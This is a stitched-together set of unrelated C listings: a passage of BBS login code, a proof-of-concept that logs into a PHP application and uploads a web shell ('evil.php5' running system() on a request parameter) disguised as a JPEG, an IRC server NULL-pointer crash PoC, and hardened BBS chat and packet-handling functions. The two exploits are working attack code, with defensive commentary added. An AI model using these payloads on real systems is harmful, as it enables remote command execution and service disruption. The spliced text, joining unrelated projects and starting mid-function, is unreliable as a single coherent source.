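             *  If no timelimit set give user 24 hours.
             */
            if (LIMIT.Time)
                usrconfig.iTimeLeft = LIMIT.Time;
            else
                usrconfig.iTimeLeft = 86400;
            usrconfig.iTimeUsed    = 0;          /* Set time used today to Zero */
            usrconfig.iConnectTime = 0;          /* Set connect time to Zero    */

            /*
             * Give user new bytes and files every day if needed.
             */
            if (LIMIT.DownK) {
                usrconfig.DownloadKToday = LIMIT.DownK;
            }
            if (LIMIT.DownF) {
                usrconfig.DownloadsToday = LIMIT.DownF;
            }
        }
    } /* End of else  */

    usrconfig.iConnectTime = 0;

    /* Copy Users Protocol into Memory */
    Set_Protocol(usrconfig.sProtocol);
    tlf(usrconfig.sProtocol);

    /*
     * Set last login Date and Time, copy previous session
     * values in memory.
     */
    snprintf(LastLoginDate, 12, "%s", StrDateDMY(usrconfig.tLastLoginDate));
    snprintf(LastLoginTime, 9, "%s", StrTimeHMS(usrconfig.tLastLoginDate));
    LastLogin = usrconfig.tLastLoginDate;
    usrconfig.tLastLoginDate = ltime; /* Set current login to current date */
    usrconfig.iTotalCalls++;

    /*
     * Update user record.
     */
    if (fseek(pUsrConfig, usrconfighdr.hdrsize + (grecno * usrconfighdr.recsize), 0) != 0) {
        WriteError("Can't seek in %s/etc/users.data", getenv("FTND_ROOT"));
    } else {
        fwrite(&usrconfig, sizeof(usrconfig), 1, pUsrConfig);
    }
    fclose(pUsrConfig);

    /*
     * Write users structure to tmp file in ~/home/unixname/exitinfo
     * A copy of the userrecord is also in the variable exitinfo.
     */
    if (! InitExitinfo())
        Good_Bye(FTNERR_INIT_ERROR);

    /*
     * If user has not set a preferred character set, force this
     */
    if (exitinfo.Charset == FTNC_NONE) {
        Chg_Charset();
    }

    setlocale(LC_CTYPE, getlocale(exitinfo.Charset));
    Syslog('b', "setlocale(LC_CTYPE, NULL) returns \"%s\"", printable(setlocale(LC_CTYPE, NULL), 0));

    GetLastUser();
    StartTime = xstrcpy(GetLocalHM());
    ChangeHomeDir(exitinfo.Name, exitinfo.Email);

    Syslog('+', "User successfully logged into BBS");
    Syslog('+', "Level %d (%s), %d mins. left, port %s", exitinfo.Security.level, LIMIT.Description, exitinfo.iTimeLeft, pTTY);
    Time2Go = time(NULL);
    Time2Go += exitinfo.iTimeLeft * 60;
    iUserTimeLeft = exitinfo.iTimeLeft;

    IsDoing("Welcome screens");
    DisplayFile((char *)"mainlogo");
    DisplayFile((char *)"welcome");

    /*
     * The following files are only displayed if the user has
     * turned the Bulletins on.
     */
    if (exitinfo.ieNEWS) {
        DisplayFile((char *)"welcome1");
        DisplayFile((char *)"welcome2");
        DisplayFile((char *)"welcome3");
        DisplayFile((char *)"welcome4");
        DisplayFile((char *)"welcome5");
        DisplayFile((char *)"welcome6");
        DisplayFile((char *)"welcome7");
        DisplayFile((char *)"welcome8");
        DisplayFile((char *)"welcome9");

        snprintf(temp, PATH_MAX, "%s", (char *) GetDateDMY() );
        if ((strcmp(exitinfo.sDateOfBirth, temp)) == 0)
            DisplayFile((char *)"birthday");

        /*
         * Displays file if it exists DD-MM.A??
         */
        snprintf(temp, PATH_MAX, "%s", (char *) GetDateDMY());
        strcpy(temp1, "");
        strncat(temp1, temp, 5);
        snprintf(temp, PATH_MAX, "%s", temp1);
        DisplayFile(temp);

        /*
         * Displays users security file if it exists
         */
        snprintf(temp, PATH_MAX, "sec%d", exitinfo.Security.level);
        DisplayFile(temp);

        /*
         * Display News file
         */
        DisplayFile((char *)"news");
    }

    /*
     * Display Onceonly file, first get the date of that
     * file, search order is the same as in DisplayFile()
     */
    st.st_mtime = 0;
    snprintf(temp, PATH_MAX, "%s/share/int/txtfiles/%s/onceonly.ans", getenv("FTND_ROOT"), lang.lc);
    stat(temp, &st);
    if (st.st_mtime == 0) {
        snprintf(temp, PATH_MAX, "%s/share/int/txtfiles/%s/onceonly.ans", getenv("FTND_ROOT"), CFG.deflang);
        stat(temp, &st);
    }
    if (st.st_mtime == 0) {
        snprintf(temp, PATH_MAX, "%s/share/int/txtfiles/%s/onceonly.asc", getenv("FTND_ROOT"), lang.lc);
        stat(temp, &st);
        if (st.st_mtime == 0) {
            snprintf(temp, PATH_MAX, "%s/share/int/txtfiles/%s/onceonly.asc", getenv("FTND_ROOT"), CFG.deflang);
            stat(temp, &st);
        }
    }

    if ((st.st_mtime != 0) && (LastLogin < st.st_mtime))
        DisplayFile((char *)"onceonly");

    OLR_SyncTags();

    if (exitinfo.MailScan) {
        IsDoing("New mail check");
        CheckMail();
    }

    /*
     * We don't show new files to new users.
     */
    if (exitinfo.ieFILE && (!IsNew)) {
        IsDoing("New files check");
        NewfileScan(FALSE);
    }

    /*
     * Copy last file Area in to current Area
     */
    SetFileArea(exitinfo.iLastFileArea);

    /*
     * Copy Last Message Area in to Current Msg Area
     */
    SetMsgArea(usrconfig.iLastMsgArea);
    SetEmailArea((char *)"mailbox");

    /*
     * Set or Reset the DoNotDisturb flag, now is the time
     * we may be interrupted.
     */
    UserSilent(usrconfig.DoNotDisturb);

    /*
     * Start the menu.
     */
    menu();
}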
/*
 * Proof-of-concept client for an authenticated file-upload weakness in a PHP
 * web application (the application is not named in this listing).
 *
 * What the visible code does:
 *   1. POSTs the supplied e-mail and password to <path>check_login.php and
 *      treats the absence of "Password is invalid" as a successful login.
 *   2. Takes the PHPSESSID cookie from that response.
 *   3. POSTs a multipart form to <path>popups/photos.php whose "photo" part
 *      is a file named evil.php5, declared as image/jpeg, with PHP content
 *      that passes a request parameter to system().
 *   4. Treats a response containing "evil.php5" as a successful upload.
 *
 * Defensive reading: the part's Content-Type and file name are both chosen
 * by the client, so neither proves the upload is an image. Server-side
 * mitigations are an allow-list of extensions (a list of forbidden
 * extensions is easy to leave incomplete), verification of the content as
 * an image, server-generated file names, and an upload directory in which
 * scripts are never executed. For detection, look for multipart uploads to
 * photo endpoints whose filename has a script extension.
 *
 * Options: --host, --port (default 80), --path, -u/--username,
 * -p/--password. Returns 0 when the upload was acknowledged, -1 otherwise.
 */
int main(int argc, char *argv[]) {

    int sd,
        option,
        optidx,
        port = 80,
        clen,
        pkglen;
    /* code[] is the multipart body: the file part plus the form fields the endpoint expects. */
    char *buffer = NULL,
         *rec = NULL,
         *session = NULL,
         *host = NULL,
         *path = NULL,
         *user = NULL,
         *passwd = NULL,
         code[] = "--AaB03x\r\n"
                  "Content-Disposition: form-data; name=\"photo\"; filename=\"evil.php5\"\r\n"
                  "Content-Type: image/jpeg\r\n"
                  "\r\n"
                  "<?php echo \"<pre>\"; system($_GET[cmd]); echo \"</pre>\"?>\r\n"
                  "--AaB03x\r\n"
                  "Content-Disposition: form-data; name=\"Call\"\r\n"
                  "\r\n"
                  "add\r\n"
                  "--AaB03x\r\n"
                  "Content-Disposition: form-data; name=\"photoType\"\r\n"
                  "\r\n"
                  "P\r\n"
                  "--AaB03x\r\n"
                  "Content-Disposition: form-data; name=\"image.x\"\r\n"
                  "\r\n"
                  "8\r\n"
                  "--AaB03x\r\n"
                  "Content-Disposition: form-data; name=\"image.y\"\r\n"
                  "\r\n"
                  "5\r\n"
                  "--AaB03x--\r\n";
    struct option long_options[] = {
        {"host",     1, 0,  1 },
        {"port",     1, 0,  2 },
        {"path",     1, 0,  3 },
        {"username", 1, 0, 'u'},
        {"password", 1, 0, 'p'},
        {NULL,       0, 0,  0 },
    };

    if(argc < 2) {
        usage(argv[0]);
        return -1;
    }

    while((option = getopt_long(argc, argv, "u:p:", long_options, &optidx)) > 0) {
        switch(option) {
            case 1:
                host = optarg;
                break;
            case 2:
                port = atoi(optarg);
                break;
            case 3:
                path = optarg;
                break;
            case 'u':
                user = optarg;
                break;
            case 'p':
                passwd = optarg;
                break;
            default:
                usage(argv[0]);
                return -1;
                break;
        }
    }

    /* All of host, path, user and password are required. */
    if(!host || !path || !user || !passwd || port < 0) {
        usage(argv[0]);
        return -1;
    }

    printf("\n[*] Connecting...\n");

    if((sd = socket_connect(host, port)) < 0) {
        printf("[-] Connection failed!\n\n");
        free(buffer);
        return -1;
    }

    printf("[+] Connected"
           "\n[*] Login...");

    /* Step 1: login request; vspr() allocates buffer and returns its length. */
    clen = strlen(user)+strlen(passwd)+16;
    pkglen = vspr(&buffer, "POST %scheck_login.php HTTP/1.1\r\n"
                           "Host: %s\r\n"
                           "Content-Type: application/x-www-form-urlencoded\r\n"
                           "Content-Length: %d\r\n"
                           "\r\n"
                           "email=%s&password=%s", path, host, clen, user, passwd);

    if(send(sd, buffer, pkglen, 0) < 0) {
        printf("[-] Sending failed!\n\n");
        free(buffer);
        close(sd);
        return -1;
    }

    if(!(rec = socket_receive(sd, 0))) {
        printf("[-] Receive failed!\n\n");
        free(buffer);
        close(sd);
        return -1;
    }

    if(strstr(rec, "Password is invalid")) {
        printf("\n[-] Login Incorrect!\n\n");
        free(buffer);
        close(sd);
        return -1;
    }

    /* Step 2: reuse the session cookie issued by the login response. */
    session = strstr(rec, "PHPSESSID");
    if(!session) {
        printf("\n[-] Session error!\n\n");
        free(buffer);
        close(sd);
        return -1;
    }

    session = strtok(session, ";");
    if(!session) {
        printf("\n[-] Session error!\n\n");
        free(buffer);
        close(sd);
        return -1;
    }

    printf("\n[+] Login Successful"
           "\n[*] Uploading...\n");

    close(sd);

    if((sd = socket_connect(host, port)) < 0) {
        printf("[-] Connection failed!\n\n");
        free(buffer);
        return -1;
    }

    free(buffer);

    /* Step 3: the upload request, authenticated by the cookie. */
    clen = strlen(code);
    pkglen = vspr(&buffer, "POST %spopups/photos.php HTTP/1.1\r\n"
                           "Host: %s\r\n"
                           "Cookie: %s\r\n"
                           "Content-type: multipart/form-data, boundary=AaB03x\r\n"
                           "Content-Length: %d\r\n"
                           "\r\n"
                           "%s", path, host, session, clen, code);

    if(send(sd, buffer, pkglen, 0) < 0) {
        printf("[-] Sending failed!\n\n");
        free(buffer);
        close(sd);
        return -1;
    }

    if(!(rec = socket_receive(sd, 3))) {
        printf("[-] Receive failed!\n\n");
        free(buffer);
        close(sd);
        return -1;
    }

    /* Step 4: the response echoing the stored file name is taken as confirmation. */
    if(!strstr(rec, "evil.php5")) {
        printf("\n[-] Upload failed!\n\n");
        free(buffer);
        close(sd);
        return -1;
    }

    free(buffer);
    close(sd);

    printf("[+] Shell uploaded"
           "\n[+] Connection closed\n\n");

    return 0;

}
/*
 * Proof-of-concept client that the banner labels "Jinais IRC Server 0.1.8
 * NULL Pointer PoC".
 *
 * What the visible code does: connects to the given host and port, sends a
 * NICK with a random suffix (retrying while the server answers "Nickname is
 * already in use"), then sends USER and TOPIC for a channel in a single
 * write, waits for a response and closes the connection.
 *
 * Defensive reading: the only input involved is ordinary IRC commands in an
 * unusual order, so the fault lies in the server's command handling. A
 * server has to check that the client's registration state and the
 * referenced channel exist before dereferencing them. Which pointer is NULL
 * is not shown in this listing.
 *
 * Arguments: argv[1] host, optional argv[2] port (default DEFAULT_PORT).
 * Returns 0 after the data was sent, -1 on any failure.
 */
int main(int argc, char *argv[]) {

    int sd,
        rnd_num,
        len,
        port = DEFAULT_PORT;
    char pkg[BUFF_SIZE],
         *response = NULL,
         *host = NULL;

    if(argc < 2) {
        printf("\nJinais IRC Server 0.1.8 NULL Pointer PoC - (c) Salvatore Fresta"
               "\nhttp://www.salvatorefresta.net"
               "\n"
               "\nUsage: %s <target_hostname> <port> (default: %d)\n\n", argv[0], port);
        return -1;
    }

    /* The random suffix only serves to avoid nickname collisions. */
    srand(time(NULL));

    host = argv[1];
    if(argc > 2) port = atoi(argv[2]);

    printf("\nJinais IRC Server 0.1.8 NULL Pointer PoC - (c) Salvatore Fresta"
           "\nhttp://www.salvatorefresta.net"
           "\n\n[*] Connecting to %s:%hu...", host, port);

    sd = socket_connect(host, port);
    if(sd < 0) {
        printf("\n[-] Error on connect!\n\n");
        return -1;
    }

    printf("\n[+] Connection estabilished"
           "\n[*] Loggin to IRC server...");

/* Retry point: a new nickname is chosen when the previous one was taken. */
login:

    rnd_num = rand()%100+1;

    len = snprintf(pkg, sizeof(pkg), "NICK randomnickname%d\r\n", rnd_num);
    if(len < 0 || len > sizeof(pkg)) {
        perror("\n[-] Error: snprintf");
        socket_close(sd);
        return -1;
    }

    if(socket_send(sd, pkg, len) < 0) {
        perror("\n[-] Error: socket_send");
        socket_close(sd);
        return -1;
    }

    response = socket_receive(sd, 3);
    if(!response) {
        perror("\n[-] Error: socket_receive");
        socket_close(sd);
        return -1;
    }

    if(strstr(response, "Nickname is already in use")) {
        free(response);
        goto login;
    }

    free(response);

    printf("\n[+] Login successfully"
           "\n[*] Data sending...");

    rnd_num = rand()%100+1;

    /* USER and TOPIC are sent together in one write. */
    len = snprintf(pkg, sizeof(pkg), "USER blabla\r\nTOPIC #ch%d\r\n", rnd_num);
    if(len < 0 || len > sizeof(pkg)) {
        perror("\n[-] Error: snprintf");
        socket_close(sd);
        return -1;
    }

    if(socket_send(sd, pkg, len) < 0) {
        perror("\n[-] Error: socket_send");
        socket_close(sd);
        return -1;
    }

    response = socket_receive(sd, 3);
    if(!response) {
        perror("\n[-] Error: socket_receive");
        socket_close(sd);
        return -1;
    }

    socket_close(sd);

    printf("\n[+] Data sent successfully"
           "\n[+] Connection closed\n\n");

    return 0;

}
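/*
 * Parse a "100:2,<rc>,<message>;" reply held in reply, show the decoded
 * message with DispMsg() and leave it, NUL-terminated, in resp.
 * Returns the numeric <rc> field (1 = fatal, chat ended), or -1 when the
 * reply has no <rc> field. A missing message is shown as an empty line.
 * resplen must be larger than 80.
 */
static int chat_show_reply(char *reply, char *resp, size_t resplen)
{
    char    *rcfield, *msg;

    strtok(reply, ":");             /* Should be 100 */
    strtok(NULL, ",");              /* Should be 2   */
    rcfield = strtok(NULL, ",");    /* 1= fatal, chat ended */
    if (rcfield == NULL)
        return -1;
    msg = strtok(NULL, ";");        /* The message   */

    /* Clear first so the 80-byte copy below is always terminated. */
    memset(resp, 0, resplen);
    if (msg != NULL)
        strncpy(resp, cldecode(msg), 80);
    DispMsg(resp);
    return atoi(rcfield);
}



/*
 * Chat, if the parameters are not NULL, a connection with the named
 * channel is made with the give username which will be forced to the
 * used nick name. This mode is used for forced sysop chat.
 * If the parameters are NULL, then it's up to the user what happens.
 *
 * Hardening compared with the previous version, with no change on
 * well-formed replies:
 *   - chat replies are parsed in one helper that checks every strtok()
 *     result, so a short reply no longer passes NULL to strncpy();
 *   - replies that are only read and discarded are copied with a bound; they
 *     were copied with an unbounded strcpy() into the 200-byte buffer;
 *   - typed characters are limited to the size of sbuf as well as to the
 *     screen width, which could exceed the 81-byte buffer on wide terminals.
 *
 * NOTE(review): the CGET polling loops keep spinning while socket_send()
 * fails, and Language() strings are passed to mvprintw() in the format
 * position. Both are unchanged.
 */
void Chat(char *username, char *channel)
{
    int             width, curpos = 0, stop = FALSE, data, rc;
    unsigned char   ch;
    char            sbuf[81], resp[128], *name, *mname;
    static char     buf[200];
    time_t          c_start, c_end;

    WhosDoingWhat(SYSOPCHAT, NULL);
    clear();

    rsize = rows - 5;
    rpointer = 0;

    if (SYSOP == TRUE) {
        /*
         * Forbid the sysop to chat, the sysop MUST use mbmon.
         */
        Syslog('+', "The Sysop attempted to chat");
        pout(LIGHTRED, BLACK, (char *) Language(29));
        Enter(1);
        Pause();
        return;
    }

    if (username && channel) {
        colour(LIGHTGREEN, BLACK);
        PUTCHAR('\007');
        /* *** Sysop is starting chat *** */
        pout(LIGHTGREEN, BLACK, (char *) Language(59));
        Enter(1);
        sleep(1);
        PUTCHAR('\007');
        sleep(1);
        PUTCHAR('\007');
        Syslog('+', "Sysop chat started");
        chat_with_sysop = TRUE;
    } else {
        Syslog('+', "User started chatting");
    }

    /*
     * Setup the screen, this is only possible in ANSI mode.
     */
    clear();
    locate(1, 1);
    colour(WHITE, BLUE);
    snprintf(buf, 200, "%-*s", cols, " MBSE BBS Chat Server");
    mvprintw(1, 1, buf);

    mname = xstrcpy(clencode(exitinfo.sUserName));
    name  = xstrcpy(clencode(exitinfo.Name));
    width = cols - (strlen(name) + 3);
    snprintf(buf, 200, "CCON,4,%d,%s,%s,0;", mypid, mname, name);
    free(mname);
    free(name);
    if (socket_send(buf) == 0) {
        strncpy(buf, socket_receive(), sizeof(buf)-1);
        if (strncmp(buf, "200:1,", 6) == 0) {
            Syslog('!', "Chat server is not available");
            colour(LIGHTRED, BLACK);
            mvprintw(4, 1, (char *) Language(30));
            Enter(2);
            Pause();
            chat_with_sysop = FALSE;
            return;
        }
    }

    locate(rows - 2, 1);
    colour(WHITE, BLUE);
    snprintf(buf, 200, "%-*s", cols, " Type \"/EXIT\" to exit or \"/HELP\" for help.");
    mvprintw(rows - 2, 1, buf);

    colour(WHITE, BLACK);
    mvprintw(rows - 1, 1, ">");
    mvprintw(rows - 1, width + 2, "<");
    memset(&sbuf, 0, sizeof(sbuf));
    memset(&rbuf, 0, sizeof(rbuf));
    colour(LIGHTGRAY, BLACK);

    /*
     * If username and channelname are given, send the /nick and /join
     * commands to the chatserver.
     */
    if (username && channel) {
        snprintf(buf, 200, "CPUT:2,%d,/nick %s;", mypid, clencode(username));
        if (socket_send(buf) == 0)
            snprintf(buf, sizeof(buf), "%s", socket_receive());
        snprintf(buf, 200, "CPUT:2,%d,/join %s;", mypid, clencode(channel));
        if (socket_send(buf) == 0)
            snprintf(buf, sizeof(buf), "%s", socket_receive());
    }

    chatting = TRUE;
    c_start = time(NULL);

    while (stop == FALSE) {

        /*
         * Check for new message, loop fast until no more data available.
         */
        data = TRUE;
        while (data) {
            snprintf(buf, 200, "CGET:1,%d;", mypid);
            if (socket_send(buf) == 0) {
                strncpy(buf, socket_receive(), sizeof(buf)-1);
                if (strncmp(buf, "100:2,", 6) == 0) {
                    rc = chat_show_reply(buf, resp, sizeof(resp));
                    if (rc == 1) {
                        Syslog('+', "Chat server error: %s", resp);
                        stop = TRUE;
                        data = FALSE;
                    } else if (rc < 0) {
                        /* Malformed reply, stop polling for now */
                        data = FALSE;
                    }
                } else {
                    data = FALSE;
                }
            }
        }

        if (stop)
            break;

        /*
         * Check for a pressed key, if so then process it.
         * Allow hi-ascii for multi-language.
         */
        ch = testkey(rows -1, curpos + 2);
        if ((ch == KEY_BACKSPACE) || (ch == KEY_RUBOUT) || (ch == KEY_DEL)) {
            alarm_on();
            if (curpos) {
                curpos--;
                sbuf[curpos] = '\0';
                BackErase();
            } else {
                PUTCHAR(7);
            }
            /* if KEY_DEL isprint, do no output again */
        } else if (isprint(ch) || traduce((char *)&ch)) {
            alarm_on();
            /* Keep one byte of sbuf for the terminator, whatever the screen width */
            if ((curpos < width) && (curpos < (int)sizeof(sbuf) - 1)) {
                PUTCHAR(ch);
                sbuf[curpos] = ch;
                curpos++;
            } else {
                PUTCHAR(7);
            }
        } else if ((ch == '\r') && curpos) {
            alarm_on();
            snprintf(buf, 200, "CPUT:2,%d,%s;", mypid, clencode(sbuf));
            if (socket_send(buf) == 0) {
                snprintf(buf, sizeof(buf), "%s", socket_receive());
                if (strncmp(buf, "100:2,", 6) == 0) {
                    rc = chat_show_reply(buf, resp, sizeof(resp));
                    if (rc == 1) {
                        Syslog('+', "Chat server error: %s", resp);
                        stop = TRUE;
                    }
                }
            }
            curpos = 0;
            memset(&sbuf, 0, sizeof(sbuf));
            locate(rows - 1, 2);
            clrtoeol();
            colour(WHITE, BLACK);
            mvprintw(rows - 1, 1, ">");
            mvprintw(rows - 1, width + 2, "<");
            colour(LIGHTGRAY, BLACK);
        }
    }
    chatting = FALSE;
    c_end = time(NULL);
    mib_chats++;
    mib_chatminutes += (unsigned int) ((c_end - c_start) / 60);

    /*
     * Before sending the close command, purge all outstanding messages.
     */
    data = TRUE;
    while (data) {
        snprintf(buf, 200, "CGET:1,%d;", mypid);
        if (socket_send(buf) == 0) {
            strncpy(buf, socket_receive(), sizeof(buf)-1);
            if (strncmp(buf, "100:2,", 6) == 0) {
                rc = chat_show_reply(buf, resp, sizeof(resp));
                if (rc == 1) {
                    Syslog('+', "Chat server error: %s", resp);
                    data = FALSE;   /* Even if there is more, prevent a loop */
                } else if (rc < 0) {
                    data = FALSE;   /* Malformed reply */
                }
            } else {
                data = FALSE;
            }
        }
    }

    if (username && channel) {
        /*
         * Disjoin sysop channel
         */

        /* *** Sysop has terminated chat *** */
        snprintf(buf, 200, "%s", (char *) Language(60));
        DispMsg(buf);
        Syslog('+', "Sysop chat ended");
        chat_with_sysop = FALSE;
    } else {
        Syslog('+', "User chat ended");
    }

    /*
     * Close server connection
     */
    snprintf(buf, 200, "CCLO,1,%d;", mypid);
    if (socket_send(buf) == 0) {
        snprintf(buf, sizeof(buf), "%s", socket_receive());
    }
    sleep(2);
    clear();
}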
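/*
 * Receive handler for one client connection.
 *
 * Appends newly received bytes to client->packet and then processes every
 * complete packet at the front of that buffer. Requests rejected by
 * packet_header_is_valid_request() are logged and skipped. Accepted requests
 * are handed to usb_dispatch_packet(); if a response is expected, their
 * header is first copied into client->pending_requests. Consumed bytes are
 * removed from the front of the buffer with memmove().
 *
 * opaque: the Client whose socket should be read.
 *
 * All header fields come from the peer and are untrusted. The declared
 * length in particular is used for buffer arithmetic before the header has
 * been validated, so it is bounds-checked explicitly below.
 */
static void client_handle_receive(void *opaque) {
	Client *client = opaque;
	const char *message = NULL;
	int length;
	PacketHeader *pending_request;

	// Read into the unused tail of the packet buffer, never past its end.
	length = socket_receive(client->socket,
	                        (uint8_t *)&client->packet + client->packet_used,
	                        sizeof(Packet) - client->packet_used);

	if (length < 0) {
		if (errno_interrupted()) {
			// Interrupted receive: keep the client, try again on the next call.
			log_debug("Receiving from client (socket: %d, peer: %s), got interrupted",
			          client->socket, client->peer);
		} else {
			log_error("Could not receive from client (socket: %d, peer: %s), disconnecting it: %s (%d)",
			          client->socket, client->peer, get_errno_name(errno), errno);

			network_client_disconnected(client);
		}

		return;
	}

	if (length == 0) {
		log_info("Client (socket: %d, peer: %s) disconnected by peer",
		         client->socket, client->peer);

		network_client_disconnected(client);

		return;
	}

	client->packet_used += length;

	while (client->packet_used > 0) {
		if (client->packet_used < (int)sizeof(PacketHeader)) {
			// wait for complete header
			break;
		}

		length = client->packet.header.length;

		// A declared length larger than the packet buffer can never be
		// satisfied: the receive above is capped at sizeof(Packet), so the
		// "wait for complete packet" check below would hold forever, the
		// buffer would fill up, and the next receive would be issued with a
		// zero-byte buffer (presumably returning 0 and being misreported as
		// a disconnect by the peer - TODO confirm socket_receive semantics).
		// Reject the peer explicitly instead of stalling on its input.
		if (length > (int)sizeof(Packet)) {
			log_warn("Got request with oversized length %d from client (socket: %d, peer: %s), disconnecting it",
			         length, client->socket, client->peer);

			network_client_disconnected(client);

			return;
		}

		if (client->packet_used < length) {
			// wait for complete packet
			break;
		}

		if (!packet_header_is_valid_request(&client->packet.header, &message)) {
			log_warn("Got invalid request (U: %u, L: %u, F: %u, S: %u, R: %u) from client (socket: %d, peer: %s): %s",
			         client->packet.header.uid,
			         client->packet.header.length,
			         client->packet.header.function_id,
			         client->packet.header.sequence_number,
			         client->packet.header.response_expected,
			         client->socket, client->peer,
			         message);

			if (length < (int)sizeof(PacketHeader)) {
				// skip the complete header if length was too small, so the
				// memmove below always makes progress
				length = sizeof(PacketHeader);
			}
		} else {
			log_debug("Got request (U: %u, L: %u, F: %u, S: %u, R: %u) from client (socket: %d, peer: %s)",
			          client->packet.header.uid,
			          client->packet.header.length,
			          client->packet.header.function_id,
			          client->packet.header.sequence_number,
			          client->packet.header.response_expected,
			          client->socket, client->peer);

			if (client->packet.header.response_expected) {
				// Bound the per-client bookkeeping: remove entries from the
				// front of the array until one more fits, so a peer cannot
				// grow it without limit by never reading responses.
				if (client->pending_requests.count >= MAX_PENDING_REQUESTS) {
					log_warn("Dropping %d items from pending request array of client (socket: %d, peer: %s)",
					         client->pending_requests.count - MAX_PENDING_REQUESTS + 1,
					         client->socket, client->peer);

					while (client->pending_requests.count >= MAX_PENDING_REQUESTS) {
						array_remove(&client->pending_requests, 0, NULL);
					}
				}

				pending_request = array_append(&client->pending_requests);

				if (pending_request == NULL) {
					log_error("Could not append to pending request array: %s (%d)",
					          get_errno_name(errno), errno);

					// NOTE(review): returning here leaves the current packet
					// at the front of the buffer, undispatched; it will be
					// processed again on the next call. Confirm that this
					// retry is intended.
					return;
				}

				memcpy(pending_request, &client->packet.header, sizeof(PacketHeader));

				log_debug("Added pending request (U: %u, L: %u, F: %u, S: %u) for client (socket: %d, peer: %s)",
				          pending_request->uid,
				          pending_request->length,
				          pending_request->function_id,
				          pending_request->sequence_number,
				          client->socket, client->peer);
			}

			usb_dispatch_packet(&client->packet);
		}

		// Drop the consumed packet. At this point
		// sizeof(PacketHeader) <= packet_used and length <= packet_used
		// both hold, so the remaining byte count is never negative.
		memmove(&client->packet, (uint8_t *)&client->packet + length,
		        client->packet_used - length);

		client->packet_used -= length;
	}
}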